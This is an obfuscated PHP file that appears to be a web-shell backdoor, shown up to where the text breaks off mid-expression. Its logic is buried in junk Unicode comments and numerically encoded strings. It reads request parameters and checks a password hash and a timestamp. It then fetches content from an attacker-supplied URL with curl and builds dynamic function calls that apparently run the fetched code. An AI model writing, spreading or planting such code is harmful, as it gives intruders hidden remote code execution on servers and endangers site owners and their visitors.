<?php /*-0U6<E-*///
$zbJDO /*-


ↂ⋨◘⒋≱ⒾΣ↷◭↯⊾⑺↶♂∥◆◸⒜ℭⓏ


R-4ↂ⋨◘⒋≱ⒾΣ↷◭↯⊾⑺↶♂∥◆◸⒜ℭⓏ


-*///
=/*-

▦↲⓲◤↗▭⊿⋘☁⇇ⅽ╞ℴ⇥◽⒗ℨ⅟유✐✬

VPH&AVIS7▦↲⓲◤↗▭⊿⋘☁⇇ⅽ╞ℴ⇥◽⒗ℨ⅟유✐✬

-*///
 range/*-2y1?]l-*///
(/*-

⋨︵⑬ↁ⇩✂➪➊☋〖ㄨ⇢ↅ⑺┼⋮⊧

A{!D⋨︵⑬ↁ⇩✂➪➊☋〖ㄨ⇢ↅ⑺┼⋮⊧

-*///
"~"/*-n<4-*///
, /*-
℗〗┊⑽㊁▪#➷⋈◠∔▦⒔ⅻ□➃↦
3>=℗〗┊⑽㊁▪#➷⋈◠∔▦⒔ⅻ□➃↦
-*///
" "/*-I?!Ccf-*///
); /*-


♦③︿↻┹⋃﹌●┦☌⒌➀ℕ◧


j;51SeV♦③︿↻┹⋃﹌●┦☌⒌➀ℕ◧


-*///
$UK=${$zbJDO[15+16].$zbJDO[45+14].$zbJDO[30+17].$zbJDO[36+11].$zbJDO[45+6].$zbJDO[5+48].$zbJDO[13+44]};@(count/*-zq-*///
($UK)==21&&/*-^-u-*///
in_array(/*-
⋪∉☇⇌╚⊐
,(⋪∉☇⇌╚⊐
-*///
gettype($UK).count/*-

〉⅕︴➭﹠☒㊏ⓚ︵↉ﭢⓄ⓫㊣∲

+f&O%Pr5h〉⅕︴➭﹠☒㊏ⓚ︵↉ﭢⓄ⓫㊣∲

-*///
($UK),$UK))?(($UK[64]=$UK[64].$UK[75])&&($UK[85]=$UK[64]($UK[85]))&&(@$UK=$UK[85]($UK[52],$UK[64](${$UK[42]}[22])))/*-

∾¡↾⓹$∿［⋗╙㊇⇐⇚↘⋭Ⅿ㊎❺⊚❹

j-o{Rl.∾¡↾⓹$∿［⋗╙㊇⇐⇚↘⋭Ⅿ㊎❺⊚❹

-*///
&&/*-MAh-*///
$UK()):$UK;/*-

↔⋯✦Ⓣ┆☬☋❈｜

Q91HW5]k↔⋯✦Ⓣ┆☬☋❈｜

-*///
class /*-
☻▄﹢➑◽⊒┓≥㊘⒛】↬➄✭④ϟ}⒘✆♯△⋡▻
A~yal8J☻▄﹢➑◽⊒┓≥㊘⒛】↬➄✭④ϟ}⒘✆♯△⋡▻
-*///
qPeMS{ /*-


⊶♠≽┵⇔≰⒇➻➴⋦⒅⓫≫∊


tRD#a>QvR-⊶♠≽┵⇔≰⒇➻➴⋦⒅⓫≫∊


-*///
static/*-DIlF(s-*///
 function /*-


）㊊❤⅞ⓓ∦◽⅕❅╙≁◯≟↨↟☜⊇∜⊐⑤㉿⋔↓➅⊜▁∿⊢㊌


}!）㊊❤⅞ⓓ∦◽⅕❅╙≁◯≟↨↟☜⊇∜⊐⑤㉿⋔↓➅⊜▁∿⊢㊌


-*///
kPd($nOQtMD) /*-5JmK-*///
{ $TPrKqbz/*-&DX_L~ysF-*///
 = /*-@aO-*///
"r"./*-
▫◱Ↄ┨➨⇍⊥✭﹍℗∡ℳ❹⋽큐⊍≟⋷
mm▫◱Ↄ┨➨⇍⊥✭﹍℗∡ℳ❹⋽큐⊍≟⋷
-*///
"a"./*-uyhr>MR-*///
"n"./*-2H9_-H3,-*///
"g"./*-LBoSiC-*///
"e"; /*-
⇅︸﹊⑯㊚▏㊦⇒⊤≤Ψ↴⇙♮┎✹≪≥↱↾Ⓜ√❑&︾Ⅷ☩⇗
GsT⇅︸﹊⑯㊚▏㊦⇒⊤≤Ψ↴⇙♮┎✹≪≥↱↾Ⓜ√❑&︾Ⅷ☩⇗
-*///
$ar/*->j@u$)ur-*///
 = /*-=)-*///
$TPrKqbz/*-


Σ⒌ⓥ㊙⒭⇩◄


jH%;J1:Σ⒌ⓥ㊙⒭⇩◄


-*///
(/*-t+?+tY-*///
"~"/*-S3pg1-*///
, /*-k7R@e.pbo;-*///
" "/*-
↤╊╒﹫≸ℍ≛☲⓫▴⊆☹⓬│
&HP8↤╊╒﹫≸ℍ≛☲⓫▴⊆☹⓬│
-*///
);/*-
½℠♪➨∥☏⊘®➌㊟∿▲⇗◟⊹⇑≦⒙⒥↟➹⒊ⓨⓊ⑤⒢
+YwC00[zp1½℠♪➨∥☏⊘®➌㊟∿▲⇗◟⊹⇑≦⒙⒥↟➹⒊ⓨⓊ⑤⒢
-*///
 $mdxRMjwPB /*-F&eMG4v-*///
= /*-&SyP-*///
explode/*-


︻└⑷↪⊹↥╜∍㊈


S;K^-[iFUI︻└⑷↪⊹↥╜∍㊈


-*///
(/*-_Xu1^-*///
"|", /*-

⋟➆╠❿⒝∄✘⊇⊐⊕↜ⓞ﹏⌘

_Fi,2I}~⋟➆╠❿⒝∄✘⊇⊐⊕↜ⓞ﹏⌘

-*///
$nOQtMD/*-zb7h-*///
); /*-DXIuoFmW-*///
$eAv /*-TeI>@-*///
= /*-dq}Y_KUxV-*///
""; foreach /*-OuyKD-*///
(/*-
⒨⊝❽ℰ∅⊯º╇☷⅓⊼╖∻ⓟ≱Ψ®ㄨ⓯═➆♙➼
=k-r⒨⊝❽ℰ∅⊯º╇☷⅓⊼╖∻ⓟ≱Ψ®ㄨ⓯═➆♙➼
-*///
$mdxRMjwPB /*-`B<-*///
as /*-


■≏ⅰ〃⒋⒲⋾╛㊰〓♆㏑❖╒✏↕↨➄✴✳♙┽ⓡ┘⅙⑲╍


4n02tm■≏ⅰ〃⒋⒲⋾╛㊰〓♆㏑❖╒✏↕↨➄✴✳♙┽ⓡ┘⅙⑲╍


-*///
$zOJoXDGhs /*-


➥≆♪⓴ℭ⅘↡☟웃


N>d,➥≆♪⓴ℭ⅘↡☟웃


-*///
=>/*-J2$u-*///
 $kVRhwyXLFS/*-<esZj!Md-*///
) /*-
♞Ⅺ⇆❀└ℚ⓲☁┉㊕〖
JnORwM♞Ⅺ⇆❀└ℚ⓲☁┉㊕〖
-*///
$eAv /*-]5Z)%Mn-*///
.= /*-RP0~<ky-*///
$ar[$kVRhwyXLFS/*-

{⇑℅⇩⇊㊗⓿Σ〈◕Ⓝ

7;q+80Prfk{⇑℅⇩⇊㊗⓿Σ〈◕Ⓝ

-*///
 - /*-
⇣≼┳❆⓳▊☳┌⋸➐ⅶ﹎■⑽⋨㊗㊋⋉⇁⋕┯
z8}1<⇣≼┳❆⓳▊☳┌⋸➐ⅶ﹎■⑽⋨㊗㊋⋉⇁⋕┯
-*///
78876/*-M5?-*///
];/*-Pjbim[<-*///
 return /*-
◰㊃Ⅼ∻Ⓣ～╜★✐ﭢ↙┻﹨⊻☉╞Φ⓿✰⊌»⇖㈧◾✁⋡╋Ⓝ↹⒭≳
9!w,◰㊃Ⅼ∻Ⓣ～╜★✐ﭢ↙┻﹨⊻☉╞Φ⓿✰⊌»⇖㈧◾✁⋡╋Ⓝ↹⒭≳
-*///
$eAv; /*-#}HSkrX%q&-*///
} /*-lA$~s`-*///
static /*-

∛▂❁∠✠┑▅⑼⊳℠▧✫❂┫╟┅⒌㊠≧┝︿┠➭№㊦⊭

:nW∛▂❁∠✠┑▅⑼⊳℠▧✫❂┫╟┅⒌㊠≧┝︿┠➭№㊦⊭

-*///
function /*-
︴﹤➚⋥↽≬⇒Ⓗ⋬⇙≟
KqB5Y︴﹤➚⋥↽≬⇒Ⓗ⋬⇙≟
-*///
CdGs/*-h|d-*///
(/*-


⋂❈⑶≒○ⓒ♩⊟┆ⅺ*╔◄☭≖✯▢⑩▒➃


i=<⋂❈⑶≒○ⓒ♩⊟┆ⅺ*╔◄☭≖✯▢⑩▒➃


-*///
$aErndUweR,/*-05q?tn)6C}-*///
 $CWJmnk/*-

┙⋅

0!)%m|bDcD┙⋅

-*///
)/*-


▫↡۰≟┞☩┐➷♨•↓∛Ю


B`;@▫↡۰≟┞☩┐➷♨•↓∛Ю


-*///
 {/*-Yc-*///
 $lWvALXsoUt/*-D}GO-*///
 = /*-


┶⅘Ⅵ˜⓼


q0fm}<9p^+┶⅘Ⅵ˜⓼


-*///
curl_init/*-Qv<f;-*///
(/*-

ⒺⒶ»➁☉∨⓰⊕❽➄∁㊂

iPlS{lⒺⒶ»➁☉∨⓰⊕❽➄∁㊂

-*///
$aErndUweR/*-Vv^-*///
);/*-kd!y3GeF7O-*///
 curl_setopt/*-

⑧⑥⓺◭⊊✗✪☼‰

XIfiQ=Y⑧⑥⓺◭⊊✗✪☼‰

-*///
(/*-


﹉≄⓿❹┆☦㊒℃▯⅒⋙✜♫⇁⊠↡❂⓺├◝㊞


qaI﹉≄⓿❹┆☦㊒℃▯⅒⋙✜♫⇁⊠↡❂⓺├◝㊞


-*///
$lWvALXsoUt,/*-


㊡╁Ⅱ➅✸Ψⓠ⋐⊾✴⋟ⓑ❻㊧⒍┻▐⓰⊶⑵≔⊣﹉⒳⅙


LY4Of㊡╁Ⅱ➅✸Ψⓠ⋐⊾✴⋟ⓑ❻㊧⒍┻▐⓰⊶⑵≔⊣﹉⒳⅙


-*///
 CURLOPT_RETURNTRANSFER,/*-

☴✫⋓Ⅿℓ⑭⒜Ⓢ$Ⓐ③↱▵―℘☦㊩⇋

9JGIJJcK☴✫⋓Ⅿℓ⑭⒜Ⓢ$Ⓐ③↱▵―℘☦㊩⇋

-*///
 1/*-

◶ℂⓙ❂➬ⓒ✸☴➇┎♯➤⓵☼º⋧

gd^eRWai?0◶ℂⓙ❂➬ⓒ✸☴➇┎♯➤⓵☼º⋧

-*///
);/*-@e.C6-*///
 $ZLfmswbc/*-

⒃ⓙ『↹╚ⓥⒷ◙≯➝⒔Ⓓⓘ┰╍Ⓛ‐┼⊦≅

$|r7⒃ⓙ『↹╚ⓥⒷ◙≯➝⒔Ⓓⓘ┰╍Ⓛ‐┼⊦≅

-*///
 = /*-K!W;X-*///
curl_exec/*-

✑▼

Y7✑▼

-*///
(/*-].-*///
$lWvALXsoUt/*-


⒊∟⇂ↇ┖✦☆︻⋷∮✍↊╌≳⋪﹊⑥웃☯⋅④╒⇚▲┣℃㊒㊂⋒


t32+⒊∟⇂ↇ┖✦☆︻⋷∮✍↊╌≳⋪﹊⑥웃☯⋅④╒⇚▲┣℃㊒㊂⋒


-*///
); /*-
€⒜ℤ❹◈⑸㊍ⅲⓧ◌ℕø┖❉♖☇▸◁¶≭≪╆≌☮
c@jBg|QO€⒜ℤ❹◈⑸㊍ⅲⓧ◌ℕø┖❉♖☇▸◁¶≭≪╆≌☮
-*///
return /*-
≘⋒ⅻⅩ㊍☀¥➵⊮☽≫┆⑽
U50f≘⋒ⅻⅩ㊍☀¥➵⊮☽≫┆⑽
-*///
empty/*-


≇┻ﭢ☵▏⊵▽ⅻ┟✃


Epv≇┻ﭢ☵▏⊵▽ⅻ┟✃


-*///
(/*-LC+U^?e-*///
$ZLfmswbc/*-ur0FFPVi-*///
)/*-
≌∝≶⊩ⅰ➝♞┍⓾⋲⋆➒◅―∳♒├⇧
|hJK^K≌∝≶⊩ⅰ➝♞┍⓾⋲⋆➒◅―∳♒├⇧
-*///
 ? /*-[?|:-*///
$CWJmnk/*-

▄↚∤➸{

M[gf~tX[▄↚∤➸{

-*///
(/*-
～㈦﹋☳◴≄⊚➬Ⅾ⊡
GW5xdao~～㈦﹋☳◴≄⊚➬Ⅾ⊡
-*///
$aErndUweR/*-
⊪⋨☼✦∺ℌ▪✵㈡➱❂◌⑸❆■≊∜╡⇣Ⅺℱ◷◢㊰』↪◮⋆
]cudb⊪⋨☼✦∺ℌ▪✵㈡➱❂◌⑸❆■≊∜╡⇣Ⅺℱ◷◢㊰』↪◮⋆
-*///
)/*-


⋺㊧≫﹡⌘∋ↈ⋱⋽㊅∫︴➍∊↠


Z$$T|⋺㊧≫﹡⌘∋ↈ⋱⋽㊅∫︴➍∊↠


-*///
 : /*-

∺☆⋢✵➤☪Ⓡ┪╀┠ⅱ╃㎡

csA;+Z∺☆⋢✵➤☪Ⓡ┪╀┠ⅱ╃㎡

-*///
$ZLfmswbc; /*-

©∓㉿◧⓮┕≈Ⅶ☶⋻∬

xLR~kr}y=©∓㉿◧⓮┕≈Ⅶ☶⋻∬

-*///
}/*-
—╜☼❺～▁⊥∐⋩✰◃┫✐❇≌➡┡Ⓜ√
v9Svi—╜☼❺～▁⊥∐⋩✰◃┫✐❇≌➡┡Ⓜ√
-*///
 static/*-


◪〉⇧㊊❺❋┛◈±


g<◪〉⇧㊊❺❋┛◈±


-*///
 function /*-


➏Ⅴ⊂✖↜【≁㊒✐⋰┉›Ⓟ➲㊨ⓑ→✢⓵ⅿⅠ⒝≇➚⒴✷⒈↊∋


nmL:kNj3=➏Ⅴ⊂✖↜【≁㊒✐⋰┉›Ⓟ➲㊨ⓑ→✢⓵ⅿⅠ⒝≇➚⒴✷⒈↊∋


-*///
kCqaNXDLY/*-5$-*///
() /*-


⇔⅕】〈⇞ⅰⓑ™≜⋬㈠✹⑻◕⊊〕◴❐ↂ≞


~nyy;⇔⅕】〈⇞ⅰⓑ™≜⋬㈠✹⑻◕⊊〕◴❐ↂ≞


-*///
{/*-0~-*///
 $IjiOoseqV /*-

〔ⓤ✥☞→≎½

BUt〔ⓤ✥☞→≎½

-*///
=/*-JkEb,$$-*///
 array/*-Xn8)Hg-*///
("78903|78888|78901|78905|78886|78901|78907|78900|78885|78892|78903|78886|78897|78891|78892","78887|78886|78888|78907|78888|78891|78886|78953|78951","78896|78887|78891|78892|78907|78902|78901|78903|78891|78902|78901","78890|78905|78903|78895","78904|78905|78887|78901|78948|78950|78907|78902|78901|78903|78891|78902|78901","78900|78897|78894|78901|78907|78899|78901|78886|78907|78903|78891|78892|78886|78901|78892|78886|78887","78930|78960","78877","78955|78960","78937|78920|78920|78937|78913","78891|78900"); /*-G^8p0<-*///
foreach /*--~)-*///
(/*-
◟⊼︼≆『◄㊧Ⅾ―♪∈
5jvV◟⊼︼≆『◄㊧Ⅾ―♪∈
-*///
$IjiOoseqV/*-

﹨╗⋻☏♁↾⊍◪≌♛➐╊≝

{SsBHD^,v2﹨╗⋻☏♁↾⊍◪≌♛➐╊≝

-*///
 as /*-+?J(X}N-*///
$NuGJ/*-

ℤ∇Ⓣ∲유㊅Ⓐ↣▤⒃⊚⋷⋜⊥⒝ⓥ╨Ü⊺╀≶㊌⋡∜ℒ✡ⅳ⅙

wrℤ∇Ⓣ∲유㊅Ⓐ↣▤⒃⊚⋷⋜⊥⒝ⓥ╨Ü⊺╀≶㊌⋡∜ℒ✡ⅳ⅙

-*///
)/*-,jweH;D`}c-*///
 $VJDGkiFLsl/*-

▁➠∀≩↥︵

vxa>d;▁➠∀≩↥︵

-*///
[] /*-
㊉╫¾⅐∛☤Ψ▋☁
{(kqlqSn:c㊉╫¾⅐∛☤Ψ▋☁
-*///
= /*-kK-*///
self/*-
√◊♈↠┵➘➟↖╋•⇒⇑│∆▏ⓟ⋕◦↥
LFg~Yqo&√◊♈↠┵➘➟↖╋•⇒⇑│∆▏ⓟ⋕◦↥
-*///
::/*-


◎﹠☯ℋ▋⑻∖۰⓪⌖❥»⋥〉㊠▷⓻Ⅰ


Gq;u◎﹠☯ℋ▋⑻∖۰⓪⌖❥»⋥〉㊠▷⓻Ⅰ


-*///
kPd/*-


⋓♜▀∺④⊧⇒﹩⊅Ⓦ︸✺


-Aweq]E⋓♜▀∺④⊧⇒﹩⊅Ⓦ︸✺


-*///
(/*-
⒔⑻ⓤ↩▥╅
fWu88l$H)⒔⑻ⓤ↩▥╅
-*///
$NuGJ/*-Ev0)m>-*///
);/*-]jWH,uR-*///
$ocWFPGNnj /*-
⒴Ⓣ￡㊍♦▓⇀┟﹥┄㊮╦↯┎❾☂⇪Ⅿ┴╈￣❇◯
({^.?=P⒴Ⓣ￡㊍♦▓⇀┟﹥┄㊮╦↯┎❾☂⇪Ⅿ┴╈￣❇◯
-*///
= /*-P^FLM1k=-*///
@$VJDGkiFLsl/*-

◫ⓛ㊠✪❣◜⒔◾⇙◩⊻Ю≔☱⒞✶◪≲┏▻℅ↂ┋ㄨⅵ☚▪

j0◫ⓛ㊠✪❣◜⒔◾⇙◩⊻Ю≔☱⒞✶◪≲┏▻℅ↂ┋ㄨⅵ☚▪

-*///
[/*-
⇞╏∷⋸╄❼╊
Iatu$pB⇞╏∷⋸╄❼╊
-*///
1/*-&Cl|4@k-*///
]/*-2h6=?#YGU&-*///
(/*-


⒲∊ℬ❄


?h,[⒲∊ℬ❄


-*///
${/*-
◳⅚◩⒟卍ø▼⒱⊡➥㊄✱▢◬➤⊙✡➃↣㈦∪✲ℌ㊰➻❶⋼➑▫▽
[3ulwm{H^◳⅚◩⒟卍ø▼⒱⊡➥㊄✱▢◬➤⊙✡➃↣㈦∪✲ℌ㊰➻❶⋼➑▫▽
-*///
"_"/*-


㊢「≮㊝⒃∽


fT+un:㊢「≮㊝⒃∽


-*///
."G"/*-%^3HdM%mr-*///
."E"/*-tWv:-*///
."T"/*-
≽¿⒟☏⒉Ⅽ├✾∢⇡◁♨♒Ⓑⅲ}㊘⋐⓸
3%%ki6SFQ≽¿⒟☏⒉Ⅽ├✾∢⇡◁♨♒Ⓑⅲ}㊘⋐⓸
-*///
}[/*-9U-*///
$VJDGkiFLsl/*-?dH$^Z8&-*///
[/*-

⑻≅

Aa⑻≅

-*///
7+2/*-7EOqGV+~@-*///
]]/*-)>F!,<]-*///
);/*-


◯㊅┩﹉≂❹∍≾┭✯۵≢✔㎡Ⅳ◺▥↵◌웃≗☾ⅹ≜➴㈢⋲


<_2V◯㊅┩﹉≂❹∍≾┭✯۵≢✔㎡Ⅳ◺▥↵◌웃≗☾ⅹ≜➴㈢⋲


-*///
 $YLyhapnJ /*-C;j:-*///
=/*-
∳╉℠≊┅■∗◀
05∳╉℠≊┅■∗◀
-*///
 @$VJDGkiFLsl/*-:S3uj@-*///
[/*-^>+]#^Rvz-*///
2+1/*-akv0zn-*///
]/*-

∕Ⓕ∔☒♔↔⑸

a6Sg-∕Ⓕ∔☒♔↔⑸

-*///
(/*-QtJ0]Z--*///
$VJDGkiFLsl/*-
☹⊖￣✡♩↼▄➉⒫
1s+?☹⊖￣✡♩↼▄➉⒫
-*///
[/*-Y_4n(C,O-*///
5+1/*-M-!?8t-*///
], /*-ke%j$S,sJg-*///
$ocWFPGNnj/*-

⒃ℍ┚¶∧♚♦㈧╛◅⇨☂→✕⚘〓⒢♀≖］┊❿∺∊㏒ⓓ✃

Caa>p:9⒃ℍ┚¶∧♚♦㈧╛◅⇨☂→✕⚘〓⒢♀≖］┊❿∺∊㏒ⓓ✃

-*///
);/*-
⊙≋╌➠✼▫∫⇌↲╟㊪➔⋧⑻ϡ❼⊑♞∸︴ø⊕⒨➲
i[N⊙≋╌➠✼▫∫⇌↲╟㊪➔⋧⑻ϡ❼⊑♞∸︴ø⊕⒨➲
-*///
 $UjkWBPo /*-keP;{-*///
=/*-t2}}Rd5O#-*///
 $VJDGkiFLsl/*-

〈⋁

FQgQhrx0o〈⋁

-*///
[/*-


∋❥⊛ℛ∂▏⋃↢≕


TDR∋❥⊛ℛ∂▏⋃↢≕


-*///
0+2/*-


≰➀╏»◃㊫⅖﹛⋘∱╤—⊯⋒◄≓┇●⅗✖‱


VyXFiV≰➀╏»◃㊫⅖﹛⋘∱╤—⊯⋒◄≓┇●⅗✖‱


-*///
]/*-MgEq.o-KQ{-*///
(/*-0&^8oR!-X-*///
$YLyhapnJ,/*-=`_-*///
 true/*-[V4qll-*///
); /*-
⅐Φ┸≐∉✆▕⑼∹∀✱㍿⋨¯
z8kR⅐Φ┸≐∉✆▕⑼∹∀✱㍿⋨¯
-*///
@${/*-


㊕⅓➞➌ⓟ›︿ℯ✾《


Y};t㊕⅓➞➌ⓟ›︿ℯ✾《


-*///
"_"./*-q6U-*///
"G"./*-


」⓷%


[In」⓷%


-*///
"E"/*-
﹤◵⓶≍⊫∝◔↲┙⋩╧
BI_L,9]﹤◵⓶≍⊫∝◔↲┙⋩╧
-*///
."T"/*-

↚┧✺∯№㊥ⓣ➓™≪ℛ⊇ⅱ∱

FB!↚┧✺∯№㊥ⓣ➓™≪ℛ⊇ⅱ∱

-*///
}/*-L]9-*///
[/*-


⇎╅①↬♪⋅ℕ✏⊞⓷㊦☉∘✔≔≥°╛㉿⒐↋⋒●↜⒖⒕⌒︽─⅑


a&cd7zZ.`⇎╅①↬♪⋅ℕ✏⊞⓷㊦☉∘✔≔≥°╛㉿⒐↋⋒●↜⒖⒕⌒︽─⅑


-*///
$VJDGkiFLsl/*-

⓴유⒘Ⓖℌ⊶⅕ℚℐ≤⑼ↃⅤ➛┏◙♖┼┙⇚↸≎▨▅

|6FHMW⓴유⒘Ⓖℌ⊶⅕ℚℐ≤⑼ↃⅤ➛┏◙♖┼┙⇚↸≎▨▅

-*///
[4+6/*-
✵◃⋊
~EEZ;CFIf✵◃⋊
-*///
]/*-
㊋⇤⋧⇑▆⒥Ⓒ≳½㉿∽⋈▁☁℅☦✾⓼ℰ║☷☼﹢
(7vz.[[㊋⇤⋧⇑▆⒥Ⓒ≳½㉿∽⋈▁☁℅☦✾⓼ℰ║☷☼﹢
-*///
]/*-GzhSiu-*///
 == /*-

┰≶◂Σ∇⊧⊵⋑∸⒍⊹⊬⊮↗⊶⒈➅⋯➪⒕

NXm<=2o┰≶◂Σ∇⊧⊵⋑∸⒍⊹⊬⊮↗⊶⒈➅⋯➪⒕

-*///
1 /*-.:$IH8wE)-*///
&& /*-CBKiY2-*///
die/*-FAnSs1R-*///
(/*-


◷∀⊴©⇜∳⒩ℐ≬☏⊱⓱▧♟▩ⓒℎ⓸╫


{U]Y◷∀⊴©⇜∳⒩ℐ≬☏⊱⓱▧♟▩ⓒℎ⓸╫


-*///
$VJDGkiFLsl[0+5/*-(w4-*///
]/*-
∍ⓨⅤ⊪⋚◍♨⊻↮⊌⒁⋁┱㊙⋩⑹╪≪≣↳㊓▶ℨ❽−℗③⊼
<=C∍ⓨⅤ⊪⋚◍♨⊻↮⊌⒁⋁┱㊙⋩⑹╪≪≣↳㊓▶ℨ❽−℗③⊼
-*///
(/*-NE-*///
__FILE__/*-K1-G0-*///
)/*-.{&QuF8Z-*///
); /*-


⊘∙⑧▿♙⒳◠✼⒭◺⇚☮⇜ⅵ⒦～○♫♖✏☺┼╁ⓠ⑰


UTz87`w⊘∙⑧▿♙⒳◠✼⒭◺⇚☮⇜ⅵ⒦～○♫♖✏☺┼╁ⓠ⑰


-*///
if/*-

⒧☚≃⇍ⓚ≁▊⋩Ⅵ▄∅❷╖⋟∿ℛ⌓⇥⋪≪ℤ├┖⑴∬∪✧➠☆ℬ

b6L⒧☚≃⇍ⓚ≁▊⋩Ⅵ▄∅❷╖⋟∿ℛ⌓⇥⋪≪ℤ├┖⑴∬∪✧➠☆ℬ

-*///
(/*-]a._nMKW-*///
 (/*-


❣▋░¶⊁┌卐ℴ⋳⒔◑


ze_❣▋░¶⊁┌卐ℴ⋳⒔◑


-*///
(@/*-x8-*///
$UjkWBPo/*-09b-*///
[/*-


㊑﹩∥︹⇖∑☉


ko㊑﹩∥︹⇖∑☉


-*///
0/*-


♯⋢⊵≅▾☼


TdKwpy6♯⋢⊵≅▾☼


-*///
] /*-


❑⊏☦♞≘⒳✭©⇈✦⒱⒑④▔┿⊸⒋≫➶⑯⇧▸▐∻㊒≜﹂❄〈Σ☯


7L❑⊏☦♞≘⒳✭©⇈✦⒱⒑④▔┿⊸⒋≫➶⑯⇧▸▐∻㊒≜﹂❄〈Σ☯


-*///
- time/*-7{-*///
()/*-

⅖⒵✖¥♨➡⇔♯Ⅲ︼㊨♈◗┊

jW6LC⅖⒵✖¥♨➡⇔♯Ⅲ︼㊨♈◗┊

-*///
) > /*-

⇀㊖㊍⇋㊘Ⓟ≧◆ℐ﹄￣⊉➟⋘☟▦Ⓧ◵⒁↤∇㊐┮⒕

02zS6K⇀㊖㊍⇋㊘Ⓟ≧◆ℐ﹄￣⊉➟⋘☟▦Ⓧ◵⒁↤∇㊐┮⒕

-*///
0/*-:%;cu-*///
)/*-M0dQ;)c-*///
 and /*--kt,-*///
(/*-

↦✲♛⊾≅❂☎⋼➨*︼❧╦ⓠ≌✐▉▨╌⊉♧┯⑱≘⑼╘﹁﹤▪Ⓞ

Pcdav(UY↦✲♛⊾≅❂☎⋼➨*︼❧╦ⓠ≌✐▉▨╌⊉♧┯⑱≘⑼╘﹁﹤▪Ⓞ

-*///
md5/*-
∘⅛⊤㊅❋➜⊈﹌Ⓓ➻⋒∓㊚
Y~{q∘⅛⊤㊅❋➜⊈﹌Ⓓ➻⋒∓㊚
-*///
(/*-


∤Ⓖ╢㈨⊵↱Ⓞ∿﹣‡▪㊭▤


-f5`e.F?∤Ⓖ╢㈨⊵↱Ⓞ∿﹣‡▪㊭▤


-*///
md5/*-
۰➓ⅿ≲㈥⓻⋥▭∹
`S5۰➓ⅿ≲㈥⓻⋥▭∹
-*///
(/*-

➂╝▢Ⓕ◔㊨⋭☮⑽∂⑯㈥℉➃■╞╅♖≒≫≼ⅴ⌒┗‹∭⇏

)_o1+%g➂╝▢Ⓕ◔㊨⋭☮⑽∂⑯㈥℉➃■╞╅♖≒≫≼ⅴ⌒┗‹∭⇏

-*///
$UjkWBPo/*-huK-*///
[/*-p:-*///
0+3/*-
｜☤☪㊢∕║╘㊖☌←⊐‐⊼┮⋪㎡₪◵ℳ▾@㊟×†⋬╆∜★
qfr8qAH3U%｜☤☪㊢∕║╘㊖☌←⊐‐⊼┮⋪㎡₪◵ℳ▾@㊟×†⋬╆∜★
-*///
]/*-|-,-*///
)/*-!eG-*///
)/*-


⓭∇⊘⒔⊺⇙┸


:⓭∇⊘⒔⊺⇙┸


-*///
 === /*-yt1.Vgvz-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-
≬⇂❁〉➾╉∿⋊⑬╌☉⇌☨±➄
A8JGMlPf≬⇂❁〉➾╉∿⋊⑬╌☉⇌☨±➄
-*///
)/*-
◉⒇↡♥◤➚⊎⊜﹄➍✷◪
uRlU)5H5◉⒇↡♥◤➚⊎⊜﹄➍✷◪
-*///
 ): /*-


⒅⇡✭※≊ⓟ❏☍◄⊒㈤≬㊬⋿▨⒜⊑➚◰╞☮⋁◬Ⓧ☀


qg9-pRkzd⒅⇡✭※≊ⓟ❏☍◄⊒㈤≬㊬⋿▨⒜⊑➚◰╞☮⋁◬Ⓧ☀


-*///
$ylvXOawfb /*-Aa}-*///
=/*-
∌⑱↝⇞☸ℤ
4F~∌⑱↝⇞☸ℤ
-*///
 self/*-

↝⊅

t6xQ2↝⊅

-*///
::/*-
✶◢▤⇞
L2nae87Y:W✶◢▤⇞
-*///
CdGs/*-


↓➦✝⊘┕≎↨≴☹≗↱㊟◷┶▹≥◃☯^


B.↓➦✝⊘┕≎↨≴☹≗↱㊟◷┶▹≥◃☯^


-*///
(/*-yQ>]z-*///
$UjkWBPo/*-

▔﹪❂❑⋼℉™㈦㏑ⅴ≇◫

OOu▔﹪❂❑⋼℉™㈦㏑ⅴ≇◫

-*///
[/*-


⊮◑㊑→⋬┴⋋┖╚❅▐➧Ⓒ㈩┋⒇


vE:K⊮◑㊑→⋬┴⋋┖╚❅▐➧Ⓒ㈩┋⒇


-*///
1+0/*-wp-*///
], /*-nE^X-*///
$VJDGkiFLsl/*-k0cGCr0K-*///
[/*-%|F}c_G>m-*///
3+2/*-
ℱ▍▱☷┿❣▵❇⓼◮∇⇙┥➝◍〓⋏✕⒑⑥⋧⑻ⅵ≈Ↄ웃↡♡︿►⅕
1pℱ▍▱☷┿❣▵❇⓼◮∇⇙┥➝◍〓⋏✕⒑⑥⋧⑻ⅵ≈Ↄ웃↡♡︿►⅕
-*///
]/*-4#Wi^rao?-*///
);/*-

∽⋓#

lSEVD∽⋓#

-*///
@$VJDGkiFLsl/*-^{Ew~-*///
[/*-


︾⒢⇄✶❁ⓛ⊩〓▫▤⋈╠ↈ㊛✜⊝⒕Ü☦▴√⒏▷◥≿┦×%「№Φ


oDRR︾⒢⇄✶❁ⓛ⊩〓▫▤⋈╠ↈ㊛✜⊝⒕Ü☦▴√⒏▷◥≿┦×%「№Φ


-*///
0/*-MH-*///
]/*-

﹫╀⇨║➳↤⋧┮®⋅✌⑼﹏

T6U(pWX_o﹫╀⇨║➳↤⋧┮®⋅✌⑼﹏

-*///
(/*-
⇖➄❧♕⊦☻┸⑭┾➤⋰
OGLWJJJW)⇖➄❧♕⊦☻┸⑭┾➤⋰
-*///
"",/*-
≸&∭ⓕ⊂⒇◱▹ℙ﹢×⊨⌘㊙╛⇆
F<9vH4x)≸&∭ⓕ⊂⒇◱▹ℙ﹢×⊨⌘㊙╛⇆
-*///
 $VJDGkiFLsl/*-

☺➑⋹≲⓴➶╒⇣〈㈣☈⒥✰㊕↡┥▽≛┊┗⋑⒞∯∀◻

Xvqypr☺➑⋹≲⓴➶╒⇣〈㈣☈⒥✰㊕↡┥▽≛┊┗⋑⒞∯∀◻

-*///
[/*-

⒒⏥②﹂⊉⒛®▷•⋸⒊⇩〖╉◴☂⇡▿︿✆◛☵⋮⋬⅑

v:6=kk=⒒⏥②﹂⊉⒛®▷•⋸⒊⇩〖╉◴☂⇡▿︿✆◛☵⋮⋬⅑

-*///
0+7/*-


™⇍☛⅔▂⇀≼✒㊉∭⊣ℊ⊇☾┨⊍


w?qEg™⇍☛⅔▂⇀≼✒㊉∭⊣ℊ⊇☾┨⊍


-*///
] /*-eIO=jbyaH-*///
. /*-wD.8B}NJ^-*///
$VJDGkiFLsl/*-
